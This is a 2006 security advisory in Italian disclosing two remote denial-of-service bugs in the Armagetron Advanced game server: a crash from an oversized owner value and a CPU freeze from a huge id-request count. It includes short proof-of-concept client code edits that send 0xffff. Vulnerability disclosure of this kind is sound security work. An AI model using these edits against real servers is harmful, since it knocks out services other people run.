####################################################################### Luigi Auriemma Applicazione: Armagetron Advanced http://armagetronad.net Versioni: <= 2.8.2 ed SVN corrente Piattaforme: Windows, *nix, *BSD, Mac ed altre Bugs: A] crash through an invalid owner value B] freeze through invalid num in id_req_handler Exploitation: remoto, contro server Data: 16 Jul 2006 Autore: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduzione 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduzione =============== Armagetron Advanced e' un gioco multiplayer molto conosciuto che si ispira al ben noto film Tron. ####################################################################### ======= 2) Bugs ======= --------------------------------------- A] crash through an invalid owner value --------------------------------------- Una terminazione del programma od un crash avvengono quando un client invia un owner piu' grande di MAXCLIENTS+1. La funzione che legge tale valore e' la seguente che si trova in network/nNetObject.cpp: nNetObject::nNetObject(nMessage &m):lastSyncID_(m.MessageIDBig()),refCtr_(0) Se il valore non e' eccessivamente grande il server termina con il messaggio che segue: Internal Error: Internal error in static nMachine& nMachine::GetMachine (short unsigned int) in network/nNetwork.cpp:3820 : Assertion userID <= MAXCLIENTS+1 failed ----------------------------------------------- B] freeze through invalid num in id_req_handler ----------------------------------------------- Un client puo' congelare il server utilizzando un valore num molto grande (come 0x7fff o 0xffff) nella funzione id_req_handler usata dal server in network/nNetObject.cpp. Il server sara' e rimarra' congelato con la CPU al 100%. ####################################################################### =========== 3) The Code =========== A] da aggiungere in WriteCreate in network/nNetObject.cpp: void nNetObject::WriteCreate(nMessage &m){ m.Write(id); // m.Write(owner); m.Write(0xffff); B] da aggiungere in first_fill_ids in network/nNetObject.cpp: tJUST_CONTROLLED_PTR< nMessage > m = new nMessage(id_req); // m->Write(ID_PREFETCH - 10); m->Write(0xffff); ####################################################################### ====== 4) Fix ====== Una versione corretta verra' rilasciata a breve. #######################################################################